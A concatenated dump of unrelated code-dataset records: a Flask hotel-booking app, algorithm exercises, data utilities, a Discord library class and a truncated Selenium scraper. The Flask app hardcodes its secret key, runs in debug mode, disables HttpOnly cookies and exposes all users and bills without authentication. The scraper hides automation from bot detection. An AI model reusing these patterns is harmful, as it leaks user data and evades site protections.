json\nfrom flask_cors import CORS\nfrom flask import Flask, request, jsonify, render_template, redirect, flash, url_for\nfrom flask_login import LoginManager, current_user, login_user, login_required, logout_user\nfrom sqlalchemy.exc import IntegrityError\nfrom models import db, User, Customer #add application models\nfrom models import Room , Booking , Bill\nimport datetime\n\n''' Begin Flask Login Functions '''\nlogin_manager = LoginManager()\n@login_manager.user_loader\ndef load_user(user_id):\n return User.query.filter_by(id=user_id).first()\n\n#N.B. Remember me cookies are for the event a user logs out accidentally\n\n#THE URL TO REDIRECTS USER TO IF THEY ARENT LOGGED IN\nlogin_manager.login_view = \"loginForm\"\n#Store the previous page that required login...and redirects user to it if true\nlogin_manager.use_session_for_next= False\n\n#Duration of the login_manager remember me session cookie\nlogin_manager.REMEMBER_COOKIE_DURATION= datetime.timedelta(minutes= 1)\n#Prevents client side scripts from accessing it\nlogin_manager.REMEMBER_COOKIE_HTTPONLY= False\n#Refreshes cookie on each request: if true\nlogin_manager.REMEMBER_COOKIE_REFRESH_EACH_REQUEST= True\n''' End Flask Login Functions '''\n\n\n''' Begin boilerplate code '''\n\n\ndef create_app():\n app = Flask(__name__, static_url_path='')\n app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///test.db'\n app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = True\n app.config['SECRET_KEY'] = \"MYSECRET\"\n CORS(app)\n db.init_app(app)\n login_manager.init_app(app)\n return app\n\napp = create_app()\n\napp.app_context().push()\n\n''' End Boilerplate Code '''\n\n\n#find user and pass to home.html if logged in\n\n\n@app.route('/', methods=['GET']) \ndef home():\n \n if current_user.is_authenticated:\n user= User.query.filter_by(email= current_user.email).first()\n user= user.toDict()\n return render_template('Home.html', user= user)\n return render_template('Home.html')\n\n\n@app.route('/signupForm', methods=['GET'])\ndef display_signup():\n return render_template('Signup.html')\n\n@app.route('/rooms') \ndef display_rooms():\n rooms = Room.query.all()\n if current_user.is_authenticated:\n user= User.query.filter_by(email= current_user.email).first()\n user= user.toDict()\n return render_template('Room.html', user= user , rooms=rooms)\n return render_template('Room.html' , 
rooms=rooms)\n\n@app.route('/about') \ndef display_about():\n if current_user.is_authenticated:\n user= User.query.filter_by(email= current_user.email).first()\n user= user.toDict()\n return render_template('About.html', user = user)\n return render_template('About.html')\n\n@app.route('/loginForm', methods=['GET'])\ndef loginForm():\n return render_template('Login.html')\n \n\n@app.route('/signup', methods=['POST'])\ndef sign_up():\n data= request.form # get json data (aka submitted login_id, email & password)\n \n if data == None:\n flash(\"Invalid request.\")\n return redirect(\"/\")\n\n if data['password'] !=data['confirm_password']:\n flash(\"Passwords must match!\")\n return redirect(url_for('display_signup'))\n\n elif data['password']=='' or data['email']=='':\n flash(\"Email and password fields must be filled!\")\n return redirect(url_for('display_signup'))\n\n try:\n \n user = User( email=data['email'])\n user.set_password( data['password'])\n customer= Customer(email= data['email'], firstName= data['firstName'], lastName= data['lastName'], phoneNumber= data['phoneNumber'], country=data['country'], address= data['address'])\n db.session.add(user)\n db.session.add(customer)\n db.session.commit()\n except IntegrityError:\n db.session.rollback()\n flash('Sign up failed: Account could not be created.')\n return redirect(url_for(\"display_signup\") )\n \n flash(\" Account created\")\n return redirect('/loginForm')\n \n \n@app.route('/login', methods=['POST'])\ndef login(): \n data= request.form\n if data['email']!='' and data['password']!='':\n user= User.query.filter_by(email=data['email']).first()\n if user and user.check_password(data['password']):\n \n login_user( user, remember=True, duration= datetime.timedelta(hours= 1) )\n flash(\"You have logged in successfully\")\n \n return redirect( url_for(\".display_rooms\") )\n \n flash(\"Login Failed: Invalid User email or password. \")\n return redirect( url_for('.loginForm') )\n\n flash(\"Login Failed: please Enter your credentials before submitting. 
\")\n return redirect( url_for('.loginForm') )\n \n \n@app.route(\"/logout\")\n@login_required\ndef logout():\n logout_user()\n flash('Logged Out!')\n return redirect(url_for('.home'))\n\n\n\n\n@app.route(\"/book//\", methods=[\"GET\"])\n@login_required\ndef display_booking(roomType , roomNumber):\n\n if current_user.is_authenticated:\n user= User.query.filter_by(email= current_user.email).first()\n user= user.toDict()\n return render_template('Book.html', user= user, roomNumber= roomNumber, roomType= roomType)\n\n return render_template( \"/loginForm\" )\n\n\n#Adds a booking: includes creating a bill & book room\n@app.route(\"/book//\", methods=[\"POST\"])\n@login_required\ndef addBooking(roomType , roomNumber): \n data= request.form\n\n if data and current_user.is_authenticated:\n #Get the current user's info: for tab bar\n user= User.query.filter_by(email= current_user.email).first()\n user= user.toDict()\n\n #Get dates for calculation\n endDate = data['trip-end']\n startDate = data['trip-start']\n\n \n\n #Split Date Strings into [year, month, day]\n endDate = data['trip-end'].split('-')\n startDate = data['trip-start'].split('-')\n #Create Date object using datetime\n d1= datetime.datetime( int(endDate[0]), int(endDate[1]), int(endDate[2]) )\n d2= datetime.datetime( int(startDate[0]), int(startDate[1]), int(startDate[2]) )\n print(endDate)\n print(startDate)\n print(\"Room \\n\\n\", type(roomNumber) )\n\n #Note\n #Initially you had the check out date being store as the check in date and vice versa\n\n #Make Booking object\n booking = Booking( roomNumber = int(roomNumber) , roomType = roomType , check_in_Date= d2 , check_out_Date=d1 , userEmail= current_user.email)\n #Get room and \n room = Room.query.filter_by(roomNumber= int(roomNumber) ).first()\n #set room.available=False\n room.book()\n\n try:\n db.session.add(booking)\n db.session.add(room)\n db.session.commit()\n\n #Create Bill - Once booking is sucessful\n room= Room.query.filter_by(roomType = roomType).first()\n roomRate = room.roomRate\n print(\"Room rate: \",roomRate)\n\n \n bill = Bill(roomNumber = int(roomNumber) , roomType = roomType , check_in_Date= d2 , check_out_Date=d1 , userEmail= current_user.email , roomRate = float(roomRate) )\n\n bill.calculateBill()\n try:\n db.session.add(bill)\n db.session.commit()\n except IntegrityError:\n db.session.rollback()\n \n flash(\"Your room has been successfully booked.\")\n return redirect(\"/MyBookings\")\n \n except IntegrityError:\n db.session.rollback()\n flash(\"Your booking already exist.\")\n \n return render_template('Book.html', user= user, roomNumber= roomNumber, roomType= roomType)\n\n flash(\"Invalid request.\")\n return redirect(\"/loginForm\")\n\n\n\n\n#Route for a specific room type\n@app.route('/rooms/')\n@login_required\ndef display_roomType(roomType):\n\n rooms = Room.query.filter_by(roomType = roomType , available=True)\n\n roomCount=0\n for room in rooms:\n roomCount = roomCount + 1\n\n\n rooms = Room.query.filter_by(roomType = roomType , available=True).first()\n\n if current_user.is_authenticated:\n user= User.query.filter_by(email= current_user.email).first()\n user= user.toDict()\n return render_template('Roomtype.html', user= user , roomType = roomType , rooms = rooms , roomCount = roomCount)\n \n return render_template('Roomtype.html' , roomType = roomType , rooms = rooms,roomCount = roomCount)\n\n\n\n\n@app.route('/MyBookings')\n@login_required\ndef display_bookings():\n\n if current_user.is_authenticated:\n user= User.query.filter_by(email= 
current_user.email).first()\n        user= user.toDict()\n\n        userbooking= user['bookings']\n        \n        return render_template('Userbookings.html' , user=user , bookingdetails= userbooking)\n    \n    flash(\"Only logged in users can access the previous page!\")\n    return redirect(\"/loginForm\")\n\n    \n\n@app.route('/MyAccount')\n@login_required\ndef display_AcountDetails():\n\n    if current_user.is_authenticated:\n        user= User.query.filter_by(email= current_user.email).first()\n        user= user.toDict()\n\n        accountdetails = Customer.query.filter_by(email= current_user.email).first()\n\n        return render_template('Userdetails.html' , user=user , accountdetails=accountdetails)\n\n\n#Deletes booking & unbook Room: including, booking, bill\n@app.route(\"/delete/<roomType>/<roomNumber>\", methods=['GET'])\n@login_required\ndef delete_booking(roomType, roomNumber):\n    if current_user.is_authenticated:\n        booking = Booking.query.filter_by(userEmail= current_user.email, roomType= roomType, roomNumber= int(roomNumber) ).first()\n        if booking!=None:\n            \n\n            room = Room.query.filter_by(roomNumber= int(roomNumber) ).first()\n            #set room.available=False\n            room.unbook()\n\n            bill= Bill.query.filter_by(userEmail= current_user.email, roomType= roomType, roomNumber= int(roomNumber) ).first()\n\n            try:\n                db.session.delete(booking)\n                db.session.delete(bill)\n                #room is not deleted but updated, so we just add the update\n                db.session.add(room)\n                db.session.commit()\n                flash(\"Your booking has been successfully deleted.\")\n            \n            except:\n                db.session.rollback()\n                flash(\"Booking failed to delete.\")\n        user= User.query.filter_by(email= current_user.email).first()\n        user= user.toDict()\n\n        userbooking= user['bookings']\n        \n        return render_template('Userbookings.html' , user=user , bookingdetails= userbooking)\n\n    flash(\"Only logged in users can access the previous page!\")\n    return redirect(\"/loginForm\")\n\n#Edit user account details\n@app.route(\"/MyProfile/edit\", methods=['POST'])\n@login_required\ndef edit_account():\n    data= request.form # get json data (aka submitted login_id, email & password)\n    \n    if data != None:\n        if data['password'] !=data['confirm_password']:\n            flash(\"Passwords must match!\")\n            return redirect(\"/MyProfile\")\n\n        \n\n        user= User.query.filter_by(email= current_user.email).first()\n        \n        if data['firstName'] !='':\n            user.customer.firstName= data['firstName']\n\n        if data['lastName'] !='':\n            user.customer.lastName= data['lastName']\n\n        if data['password'] !='':\n            user.set_password(data['password'])\n\n        if data['country'] !='':\n            user.customer.country= data['country']\n        \n        if data['phoneNumber'] !='':\n            user.customer.phoneNumber= data['phoneNumber']\n\n        if data['address'] !='':\n            user.customer.address= data['address']\n\n        try:\n            \n            db.session.add(user)\n            db.session.commit()\n            \n        except IntegrityError:\n            db.session.rollback()\n            flash('Update failed: Account could not be updated.')\n            return redirect(\"/MyProfile\" )\n        \n        flash(\"Your account has been successfully updated.\")\n        #return redirect('/MyProfile')\n        return redirect('/MyAccount')\n    \n    flash(\"No Data has been captured.\")\n    return redirect('/MyProfile')\n\n\n@app.route('/MyBookings/updateForm/<roomType>/<roomNumber>', methods=['GET']) \n@login_required\ndef display_booking_updateForm(roomType, roomNumber):\n    user= User.query.filter_by(email= current_user.email).first()\n    user= user.toDict()\n    booking = Booking.query.filter_by(userEmail= current_user.email, roomType= roomType, roomNumber= int(roomNumber) ).first()\n    booking= booking.toDict()\n    return render_template('Updateuserbookings.html', user= user, booking= 
booking)\n\n\n#Updates a user booking and bill\n@app.route('/MyBookings/updateForm/<roomType>/<roomNumber>', methods=['POST']) \n@login_required\ndef update_booking(roomType, roomNumber):\n    data= request.form\n    if roomType==None or roomNumber==None or data==None:\n        flash(\"An invalid request was attempted.\")\n        return redirect(\"/\")\n    \n    endDate = data['trip-end']\n    startDate = data['trip-start']\n\n    booking = Booking.query.filter_by(userEmail= current_user.email, roomType= roomType, roomNumber= int(roomNumber) ).first()\n\n\n\n    booking.check_in_Date = datetime.datetime.strptime(startDate, \"%Y-%m-%d\").date()\n    booking.check_out_Date = datetime.datetime.strptime(endDate, \"%Y-%m-%d\").date()\n    \n    bill= Bill.query.filter_by(userEmail= current_user.email, roomType= roomType, roomNumber= int(roomNumber) ).first()\n\n    #Create a date objects to add to bill\n    bill.check_in_Date = datetime.datetime.strptime(startDate, \"%Y-%m-%d\").date()\n    bill.check_out_Date = datetime.datetime.strptime(endDate, \"%Y-%m-%d\").date()\n\n    bill.calculateBill()\n\n    try: \n        db.session.add(booking)\n        db.session.add(bill)\n        db.session.commit()\n\n        flash(\"Update was successful.\")\n    \n    except: \n        db.session.rollback()\n        flash(\"Update failed.\")\n\n    return redirect(\"/MyBookings\")\n\n\n@app.route('/deleteUser', methods=['POST'])\n@login_required\ndef delete_user():\n    user= User.query.filter_by(email= current_user.email).first()\n    customer= Customer.query.filter_by(email= current_user.email).first()\n\n    bookings= Booking.query.all()\n\n    \n\n    try:\n        if bookings != None:\n            for booking in bookings:\n                if booking.userEmail == current_user.email:\n                    \n                    room= Room.query.filter_by(roomNumber= booking.roomNumber).first()\n                    room.unbook()\n                    \n                    bill= Bill.query.filter_by(roomNumber=booking.roomNumber, userEmail= current_user.email, check_in_Date= booking.check_in_Date).first()\n\n                    \n                    db.session.add(room)\n                    db.session.delete(booking)\n                    db.session.delete(bill)\n\n        db.session.delete(customer)\n        db.session.delete(user)\n        db.session.commit()\n        flash(\"Your account has been successfully deleted.\")\n    except:\n        db.session.rollback()\n        flash(\"You failed to delete your account\")\n        return redirect (request.referrer)\n    \n    return redirect(\"/\")\n\n\n\n\n@app.route('/MyBill/<roomNumber>', methods=['GET'])\n@login_required\ndef display_bill(roomNumber):\n    \n    if current_user.is_authenticated:\n        user= User.query.filter_by(email= current_user.email).first()\n        user= user.toDict()\n\n        bill = Bill.query.filter_by(roomNumber= int(roomNumber)).first() \n\n        return render_template('Userbill.html' , user = user , bill = bill)\n\n    return redirect(\"/MyBookings\")\n\n@app.route('/MyBill/<roomNumber>/pay', methods=['POST'])\n@login_required\ndef pay_bill(roomNumber):\n    bill = Bill.query.filter_by(roomNumber= int(roomNumber)).first() \n\n    if bill== None:\n        flash(\"An Invalid request was made.\")\n        return redirect('/MyBookings')\n\n    if bill.paid is True:\n        flash(\"Your bill has already been paid.\")\n        return redirect(request.referrer)\n\n    bill.pay()\n    try:\n        db.session.add(bill)\n        db.session.commit()\n        flash(\"You have successful paid your bill.\")\n\n    except: \n        db.session.rollback()\n        flash(\"Attempt to pay bill failed.\")\n\n    return redirect(request.referrer)\n\n\n    #TEST    \n@app.route('/users', methods=['GET'])\ndef all_users():\n    users= User.query.all();\n    users= [user.toDict() for user in users]\n    return jsonify(users)\n\n\n@app.route(\"/bills\", methods=[\"GET\"])\ndef display_bills():\n    bills= Bill.query.all()\n    bills= [bill.toDict() for bill in bills]\n    return 
jsonify(bills)\n\n@app.route('/r') \ndef all_rooms():\n rooms= Room.query.all();\n rooms = [room.toDict() for room in rooms];\n return jsonify(rooms)\n\n@app.route('/b')\ndef display_book():\n return render_template('Book.html')\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=8080, debug=True)\n\n\n","sub_path":"App/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":15748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"461281642","text":"\"\"\"\n子串不连续\n\"\"\"\n\n\nclass Solution:\n def minWindow(self, s: str, t: str) -> str:\n # need 需求字符出现次数,window窗口字符出现次数\n need = dict()\n window = dict()\n # need初始化字符为1,window初始化为0\n for i in t:\n need[i] = need.get(i, 0) + 1\n window[i] = window.get(i, 0)\n # 窗口区间\n left, right = 0, 0\n # 有效字符数量\n valid = 0\n # 记录覆盖最小字串的起始索引和长度\n start, str_len = 0, len(s) + 1\n # 增大窗口寻找可行解\n while right < len(s):\n # c是将移入窗口的字符串\n c = s[right]\n right += 1\n # 进行窗口内数据的操作\n if c in need:\n # 窗口内字符出现次数\n window[c] += 1\n # 记录有效次数\n if window[c] == need[c]:\n valid += 1\n # 减小窗口优化可行解,判断左侧窗口是否要收缩,有效次数==需求字符数量\n while valid == len(need):\n # 更新最小覆盖子串\n # 比上次短,才更新 right-left是匹配到字符串长度\n if right - left < str_len:\n start = left\n str_len = right - left\n # d是将移除窗口的字符\n d = s[left]\n left += 1\n if d in need:\n if window[d] == need[d]:\n valid -= 1\n window[d] -= 1\n if str_len == len(s) + 1:\n return \"\"\n return s[start:start + str_len]\n\n\nif __name__ == '__main__':\n # s = \"ADOBECODEBANC\"\n # t = \"ABC\"\n s = \"cabwefgewcwaefgcf\"\n t = \"cae\"\n result = Solution().minWindow(s=s, t=t)\n print(result)\n","sub_path":"hot/leetcode/76.最小覆盖子串/76.最小覆盖字串.py","file_name":"76.最小覆盖字串.py","file_ext":"py","file_size_in_byte":1892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"545661828","text":"import sklearn\nfrom sklearn.model_selection import train_test_split\n\n\nclass data_split:\n\n def __init__(self, df):\n self.df = df\n self.split_data()\n\n def split_data(self):\n '''\n function to split data into train, test, validate data\n The dataframe is split into 15% test, then 85% train. \n The train data set is then further split into 20% validation\n and 80% train dataset. \n So the final result is 15% of original data = test\n about 15% of original data is validation,\n and 70% of original data is train. \n '''\n\n self.train, self.test = train_test_split(\n self.df, test_size=0.15, random_state=42)\n\n self.train, self.val = train_test_split(\n self.train, test_size=0.20, random_state=42)\n\n return self.train, self.test, self.val\n\n # function to split into target and features dataset.\n\n def get_target(self, target_feature):\n '''\n function to split into target and features dataset.\n Target = target from the dataframe. 
\n '''\n\n self.target = target_feature\n self.features = self.train.columns.drop(self.target)\n\n self.x_train = self.train[self.features]\n self.y_train = self.train[self.target]\n self.x_val = self.val[self.features]\n self.y_val = self.val[self.target]\n self.x_test = self.test[self.features]\n self.y_test = self.test[self.target]\n\n return self.x_train, self.y_train, self.x_val, self.y_val, self.x_test, self.y_test\n","sub_path":"lambdata_neha00k/train_val_test.py","file_name":"train_val_test.py","file_ext":"py","file_size_in_byte":1555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"632865877","text":"#Matricula: EF03468\n#Nome: Alberto Elias Do Amaral Júnior\n#Disciplina: CCF 110 - Programação\n#Professor: José Augusto Miranda Nacif\n#Lista de Exercício: 2\n#Questão: 6\n\ni=5\nwhile i < 500:\n print(i)\n i = i + 5","sub_path":"Programação/Lista_2/6.py","file_name":"6.py","file_ext":"py","file_size_in_byte":219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"95921900","text":"# -*- coding: utf-8 -*-\nimport sys\n\nreload(sys)\nsys.setdefaultencoding('utf-8')\nfrom common import public\nimport json\n\n\nclass zhuanli_zhuanyi():\n \"\"\"万方专利\"\"\"\n need_check_ziduan = [\n u'company_name'\n ]\n\n def check_company_name(self, indexstr, ustr):\n ret = None\n try:\n bgxx = indexstr['bgxx']\n jsonbgxx = json.loads(bgxx)\n cmlist = []\n for bg in jsonbgxx:\n bgshixiang = bg[u'变更事项']\n if bgshixiang in (u'申请人', u'专利权人'):\n cm1 = bg.get(u'变更后权利人', None)\n cm2 = bg.get(u'变更前权利人', None)\n if cm1:\n cmlist.append(cm1)\n if cm2:\n cmlist.append(cm2)\n cmlist = u';'.join(cmlist)\n cmlist = cmlist.split(u';')\n if ustr and len(ustr):\n company_name_list = ustr.split(u';')\n else:\n company_name_list = []\n\n if set(company_name_list) != set(cmlist):\n ret = u'不一致,我的是-%s-' % (';'.join(cmlist))\n except Exception as e:\n ret = u'解析不出来'\n pass\n return ret\n\n\nif __name__ == '__main__':\n a = '{\"bbd_xgxx_id\": \"\", \"bbd_version\": \"1.0\", \"bbd_table\": \"zhuanli_zhuanyi\", \"bbd_dotime\": \"2016年06月14日\", \"bbd_source\": \"\", \"ipc_main_class\": \"B29C 70/42\", \"bbd_params\": \"\", \"bbd_xgxx_date\": \"2016年05月17日\", \"bbd_html\": \"\", \"bbd_customer_name\": \"bbd_dp_parse_user\", \"company_name\": \"上海日之升新技术发展有限公司;上海日之升科技有限公司\", \"bbd_type\": \"zhuanli_zhuanyi\", \"bbd_qyxx_branch\": \"[]\", \"bbd_uptime\": \"1.143944488E9\", \"bgxx\": \"[{\\\"变更事项\\\": \\\"申请人\\\", \\\"变更后权利人\\\": \\\"上海日之升科技有限公司\\\", \\\"变更前权利人\\\": \\\"上海日之升新技术发展有限公司\\\"}, {\\\"变更事项\\\": \\\"地址\\\", \\\"变更后权利人\\\": \\\"201107 上海市纪高路1399号1幢\\\", \\\"变更前权利人\\\": \\\"201109 上海市闵行区沪闵路3078号\\\"}]\", \"legal_announce_date\": \"2016年06月08日\", \"reg_effect_date\": \"2016年05月17日\", \"md5\": \"7fbc24bbc51490dbc2324b231834c266\", \"bbd_qyxx_company\": \"[\\\"上海日之升新技术发展有限公司\\\", \\\"上海日之升科技有限公司\\\"]\", \"law_state\": \"专利申请权、专利权的转移\", \"bbd_seed\": \"\", \"legal_status\": \"专利申请权的转移\", \"_id\": \"CN201310694393.6\", \"bbd_url\": \"\", \"application_code\": \"CN201310694393.6\"}'\n js = json.loads(a)\n # zhuanli_zhuanyi=zhuanli_zhuanyi()\n # print zhuanli_zhuanyi.check_company_name(json.loads(a),u\"广东轻工职业技术学院;广东轻工职业技术学院;广州市白云区芳祺化妆品厂\")\n","sub_path":"src/parse/zhuanli_zhuanyi.py","file_name":"zhuanli_zhuanyi.py","file_ext":"py","file_size_in_byte":2782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"400354128","text":"__all__ = ('VoiceState', )\n\nfrom datetime 
import datetime\n\nfrom ...backend.export import include\n\nfrom ..utils import timestamp_to_datetime\n\nfrom .utils import create_partial_user_from_id\n\ncreate_partial_role_from_id = include('create_partial_role_from_id')\n\nclass VoiceState:\n \"\"\"\n Represents a user at a ``ChannelVoice``.\n \n Attributes\n ----------\n channel : ``ChannelVoice``\n The channel to where the user is connected to.\n deaf : `bool`\n Whether the user is deafen.\n is_speaker : `bool`\n Whether the user is suppressed inside of the voice channel.\n \n If the channel is a ``ChannelVoice``, it is always `False`, meanwhile it ``ChannelStage`` it can vary.\n mute : `bool`\n Whether the user is muted.\n requested_to_speak_at : `None` or `datetime`\n When the user requested to speak.\n \n Only applicable for ``ChannelStage``-s.\n self_deaf : `bool`\n Whether the user muted everyone else.\n self_mute : `bool`\n Whether the user muted itself.\n self_stream : `bool`\n Whether the user screen shares with the go live option.\n self_video : `bool`\n Whether the user sends video from a camera source.\n session_id : `str`\n The user's voice session id.\n user : ``User`` or ``Client``\n The voice state's respective user. If user caching is disabled it will be set as a partial user.\n \"\"\"\n __slots__ = ('channel', 'deaf', 'is_speaker', 'mute', 'requested_to_speak_at', 'self_deaf', 'self_mute', 'self_stream',\n 'self_video', 'session_id', 'user', )\n \n def __init__(self, data, channel):\n \"\"\"\n Creates a ``VoiceState`` object from the given data.\n \n Parameters\n ----------\n data : `dict` of (`str`, `Any`) items\n Voice state data received from Discord.\n channel : ``ChannelVoiceBase``\n The channel of the voice state.\n \"\"\"\n self.channel = channel\n self.user = create_partial_user_from_id(int(data['user_id']))\n self.session_id = data['session_id']\n self.mute = data['mute']\n self.deaf = data['deaf']\n self.self_deaf = data['self_deaf']\n self.self_mute = data['self_mute']\n self.self_stream = data.get('self_stream', False)\n self.self_video = data['self_video']\n \n requested_to_speak_at = data.get('request_to_speak_timestamp', None)\n if (requested_to_speak_at is not None):\n requested_to_speak_at = timestamp_to_datetime(requested_to_speak_at)\n \n self.is_speaker = not data.get('suppress', False)\n \n self.requested_to_speak_at = requested_to_speak_at\n \n @property\n def guild(self):\n \"\"\"\n Returns the voice state's respective guild.\n \n Returns\n -------\n guild : `None` or ``Guild``\n \"\"\"\n return self.channel.guild\n \n def _difference_update_attributes(self, data, channel):\n \"\"\"\n Updates the voice state and returns it's overwritten attributes as a `dict` with a `attribute-name` -\n `old-value` relation.\n \n Parameters\n ----------\n data : `dict` of (`str`, `Any`) items\n Voice state data received from Discord.\n channel : ``ChannelVoice``\n The channel of the voice state.\n \n Returns\n -------\n old_attributes : `dict` of (`str`, `Any`) items\n All item in the returned dictionary is optional.\n \n Returned Data Structure\n -----------------------\n +-----------------------+-----------------------+\n | Keys | Values |\n +=======================+=======================+\n | channel | ``ChannelVoice`` |\n +-----------------------+-----------------------+\n | deaf | `str` |\n +-----------------------+-----------------------+\n | is_speaker | `bool` |\n +-----------------------+-----------------------+\n | mute | `bool` |\n +-----------------------+-----------------------+\n | 
requested_to_speak_at | `None` or `datetime` |\n +-----------------------+-----------------------+\n | self_deaf | `bool` |\n +-----------------------+-----------------------+\n | self_mute | `bool` |\n +-----------------------+-----------------------+\n | self_stream | `bool` |\n +-----------------------+-----------------------+\n | self_video | `bool` |\n +-----------------------+-----------------------+\n \"\"\"\n old_attributes = {}\n \n if (self.channel is not channel):\n old_attributes['channel'] = self.channel\n self.channel = channel\n \n deaf = data['deaf']\n if self.deaf != deaf:\n old_attributes['deaf'] = self.deaf\n self.deaf = deaf\n \n mute = data['mute']\n if self.mute != mute:\n old_attributes['mute'] = self.mute\n self.mute = mute\n \n self_deaf = data['self_deaf']\n if self.self_deaf != self_deaf:\n old_attributes['self_deaf'] = self.self_deaf\n self.self_deaf = self_deaf\n \n self_video = data['self_video']\n if self.self_video != self_video:\n old_attributes['self_video'] = self.self_video\n self.self_video = self_video\n \n self_stream = data.get('self_stream', False)\n if self.self_stream != self_stream:\n old_attributes['self_stream'] = self.self_stream\n self.self_stream = self_stream\n \n self_mute = data['self_mute']\n if self.self_mute != self_mute:\n old_attributes['self_mute'] = self.self_mute\n self.self_mute = self_mute\n \n requested_to_speak_at = data.get('request_to_speak_timestamp', None)\n if (requested_to_speak_at is not None):\n requested_to_speak_at = timestamp_to_datetime(requested_to_speak_at)\n \n if self.requested_to_speak_at != requested_to_speak_at:\n old_attributes['requested_to_speak_at'] = self.requested_to_speak_at\n self.requested_to_speak_at = requested_to_speak_at\n \n is_speaker = not data.get('suppress', False)\n if self.is_speaker != is_speaker:\n old_attributes['is_speaker'] = self.is_speaker\n self.is_speaker = is_speaker\n \n return old_attributes\n \n def _update_attributes(self, data, channel):\n \"\"\"\n Updates the voice state with overwriting it's old attributes.\n \n Parameters\n ----------\n data : `dict` of (`str`, `Any`) items\n Voice state data received from Discord.\n channel : ``ChannelVoice``\n The channel of the voice state.\n \"\"\"\n self.channel = channel\n self.deaf = data['deaf']\n self.mute = data['mute']\n self.self_deaf = data['self_deaf']\n self.self_mute = data['self_mute']\n self.self_stream = data.get('self_stream', False)\n self.self_video = data['self_video']\n \n requested_to_speak_at = data.get('request_to_speak_timestamp', None)\n if (requested_to_speak_at is not None):\n requested_to_speak_at = timestamp_to_datetime(requested_to_speak_at)\n \n self.requested_to_speak_at = requested_to_speak_at\n \n self.is_speaker = not data.get('suppress', False)\n \n def __repr__(self):\n \"\"\"Returns the voice state's representation.\"\"\"\n return f'<{self.__class__.__name__} user={self.user.full_name!r}, channel={self.channel!r}>'\n","sub_path":"hata/discord/user/voice_state.py","file_name":"voice_state.py","file_ext":"py","file_size_in_byte":7924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"373178988","text":"import random as rand\nimport matplotlib.pyplot as plt\nimport math\nimport time\n\n# main variables\ngraph = [] # 노드들\nn = 0 # 노드의 개수\nq_value = [] # q value들\ninit_q = 10000.0\nvisited = [] # 방문했던 곳 배열 TRUE / FALSE\npath = [] # 현재까지 방문했던 곳 리스트\nc_city = 0 # 현재 위치\n\n\n# parameters\npr = 0.01 # exploit rate\nd_rate = 0.9 # discount rate\n\n# 
results\nbestTour = 0\nbestTourLength = 0\n\n\ndef data_init():\n global n, q_value, visited, c_city\n with open(\"_data1.txt\", \"r\") as f:\n lines = f.readlines()\n for line in lines:\n arr = line.split(\",\")\n f_arr = [float(val) for val in arr]\n graph.append(f_arr)\n f.close()\n\n n = len(graph)\n q_value = [[init_q] * n for _ in range(n)]\n visited = [0] * n\n c_city = rand.randrange(n) # random 시작지점\n\n\ndef get_distance(node1, node2):\n global graph\n x1 = graph[node1][0]\n y1 = graph[node1][1]\n x2 = graph[node2][0]\n y2 = graph[node2][1]\n return math.sqrt(pow(x1 - x2, 2) + pow(y1 - y2, 2))\n\n\ndef nearest_neighbor(node):\n town = -1\n min_value = get_distance(node, 0)\n for i in range(1, n):\n value = get_distance(node, i)\n if i != node and value < min_value:\n town = i\n return town\n\n\ndef solve():\n global n, bestTourLength, bestTour\n result_data = []\n start_time = time.time()\n for i in range(2000):\n init()\n move()\n update_best()\n result_data.append(bestTourLength)\n\n end_time = time.time()\n print(\"Time : \" + str(end_time - start_time))\n print(\"Best tour length : \" + str(bestTourLength))\n print(bestTour)\n plt.plot(result_data)\n plt.show()\n\n\n############################\n### main_method\n############################\ndef init():\n global visited, c_city, path\n visited = [0] * n\n path = []\n c_city = rand.randrange(n)\n visited[c_city] = True\n path.append(c_city)\n\n\ndef move():\n for i in range(n - 1): # 모든곳을 다 탐색할 때까지\n selected_town = select_next_town() # 이동할 도시 탐색\n visit_town(selected_town) # 이동 및 q-value 업데이트\n\n\ndef update_best():\n global bestTourLength, bestTour\n total_distance = 0\n for i in range(n):\n total_distance += get_distance(path[i - 1], path[i])\n\n if bestTourLength == 0 or total_distance < bestTourLength:\n bestTourLength = total_distance\n bestTour = path\n\n\n#######################\n### sub_method\n#######################\ndef select_next_town():\n # 모혐형 랜덤탐색\n if rand.random() < pr:\n while True:\n t = rand.randrange(n) # random town\n if not visited[t]:\n return t\n\n # 최소값 선택방식\n q_min = 0\n q_min_city = -1\n for next_city in range(n):\n if not visited[next_city] and (q_min == 0 or q_value[c_city][next_city] < q_min):\n q_min = q_value[c_city][next_city]\n q_min_city = next_city\n\n # if q_min_city == -1:\n # print(\"break\")\n\n return q_min_city\n\n\ndef visit_town(next_city):\n global c_city, path\n # visit\n visited[next_city] = True\n path.append(c_city)\n\n # q-value update\n q_value[c_city][next_city] = 0.1 * get_distance(c_city, next_city) + 0.9 * min(q_value[next_city])\n c_city = next_city\n\n\nif __name__ == \"__main__\":\n data_init()\n solve()","sub_path":"tsp_rl/RL_v2.py","file_name":"RL_v2.py","file_ext":"py","file_size_in_byte":3509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"173202231","text":"from selenium import webdriver\nimport sched\nimport time\nimport tkinter.messagebox # 弹窗库\nfrom tkinter import *\nfrom playsound import playsound\nimport re\nimport json\nimport pymysql\nimport random\nfrom selenium import common\nimport openpyxl\n\n\"\"\" 半自动实现 \"\"\"\n\n\ndef start(random_good):\n chrome_path = r'd:/driverAndPlugs/chromedriver.exe'\n mp3_path = r'd:/菊花台.mp3'\n options = webdriver.ChromeOptions()\n # 不加载图片\n options.add_experimental_option(\"prefs\", {\"profile.managed_default_content_settings.images\": 2})\n # 设置为开发者模式,防止被各大网站识别出来使用了Selenium window.navigator.webdriver 检测\n options.add_experimental_option('excludeSwitches', 
